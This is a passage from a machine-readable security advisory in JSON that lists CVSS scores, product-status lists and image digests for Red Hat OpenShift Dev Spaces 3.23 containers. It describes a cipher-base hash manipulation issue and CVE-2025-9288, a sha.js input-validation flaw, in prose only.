            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "cipher-base: Cipher-base hash manipulation"
    },
    {
      "cve": "CVE-2025-9288",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "discovery_date": "2025-08-20T23:00:56.263191+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2389980"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A vulnerability was found in sha.js, where the hashing implementation does not perform sufficient input type validation. The .update() function accepts arbitrary objects, including those with crafted length properties, which can alter the internal state machine of the hashing process. This flaw may result in unexpected behavior such as rewinding the hash state, producing inconsistent digest outputs, or entering invalid processing loops. The issue was introduced due to the reliance on JavaScript object coercion rules rather than enforcing strict buffer or string inputs.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "sha.js: Missing type checks leading to hash rewind and passing on crafted data",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability was marked as Important rather then Critical because while the lack of input type checks in sha.js allows for hash state rewinding, crafted collisions, and potential denial of service, the vulnerability requires highly specific crafted input objects that are unlikely to occur in typical real-world usage, especially since most applications pass well-formed strings or buffers to hashing functions. Moreover, the cryptographic breakages described, such as nonce reuse leading to private key extraction, are indirect and depend on downstream libraries misusing sha.js for sensitive operations without additional validation layers. As a result, the flaw significantly undermines correctness and robustness of the hashing API, but its exploitability in common production systems is constrained, which could justify viewing it as an Important vulnerability rather than a Critical one.\n\n\nThe flaw requires applications to pass attacker-controlled, non-standard JavaScript objects into hash.update(). Most real-world Node.js applications and libraries already use Buffer, TypedArray, or String inputs, which are unaffected. Furthermore, Node\u2019s built-in crypto module, which is widely adopted, enforces stricter type-checking and is not impacted. As a result, the vulnerability mainly threatens projects that (a) directly depend on sha.js for cryptographically sensitive operations, and (b) hash untrusted input without type validation.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
